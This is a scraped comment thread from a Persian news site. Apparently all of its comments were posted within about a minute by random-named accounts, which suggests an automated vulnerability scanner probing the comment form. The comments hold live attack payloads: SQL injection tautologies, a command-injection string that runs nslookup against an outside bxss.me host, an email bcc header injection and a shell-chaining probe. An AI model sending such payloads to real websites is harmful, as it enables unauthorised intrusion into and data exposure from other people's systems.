تاریخ: 1398/12/08 ساعت 19:55
1
bcc:013405.38-3379.38.e1858.1@bxss.me

0 0

hedluycc 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
0

0 0

hedluycc 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:54
0

0 0

hedluycc 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:54
0

0 0

hedluycc 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:54
0

0 0

nkvatkgu 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:54
3Q4CeSAc

0 0

hedluycc 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:54
-1" OR 2+969-969-1=0+0+0+1 --

0 0

hedluycc 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:54
-1 OR 2+129-129-1=0+0+0+1

0 0

hedluycc 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:54
-1 OR 2+114-114-1=0+0+0+1 --

0 0

nynhscfg 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:54
$(nslookup dns.ce.13405.38-3359.38.e1858.1.bxss.me)

0 0

hedluycc 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:54
UmTTn8no

0 0

nynhscfg 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:54
set|set&set

0 0

torcfmew 50 سال میگه :

تاریخ: 1398/12/08 ساعت 19:54
1

پر بحث ترین خبرها
اخبار سایر رسانه ها